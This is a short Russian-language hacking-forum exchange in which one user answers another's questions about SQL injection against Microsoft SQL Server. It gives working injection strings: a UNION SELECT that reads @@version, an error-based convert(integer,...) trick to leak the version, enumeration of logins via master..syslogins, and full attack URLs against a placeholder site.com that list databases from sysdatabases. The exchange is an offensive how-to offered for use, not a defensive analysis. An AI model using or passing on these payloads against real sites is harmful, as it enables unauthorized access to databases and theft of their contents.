Сообщение от
jokester
T-SQL помоему не поддерживает /*
поддерживает.
Сообщение от
jokester
Разве это будет работать? Дело даже не в опечатке "@@version()"
а ты как думаешь ? конечно будет . исправил
Сообщение от
jokester
Это если честно не понял , поясни, если не трудно.
если версия
Код:
union+select+@@version
так не узнаётся или появляется ошибка
то преобразуем это в всё в конверсию целого aka convert ()
Код:
convert(integer,(select+@@version))--
Сообщение от
jokester
Опять-же , это разве работает? master..syslogins, ещё туда-сюда, но помоему конструкция запроса не верна
пониаешь имена пользователей могу хранится в табличке syslogins так и в master..syslogins.
Сообщение от
jokester
Не понял откуда ты выводишь список баз? "sysdatabases"- Это системная таблица какая-то?
список баз выводится из таблички sysdatabases или master..sysdatabases если тебе так не понятно то вот так
Код:
http://site.com/index.php?search=-1+union+select+name+from+sysdatabases--
или
Код:
http://site.com/index.php?search=-1+union+select+name+from+master..sysdatabases--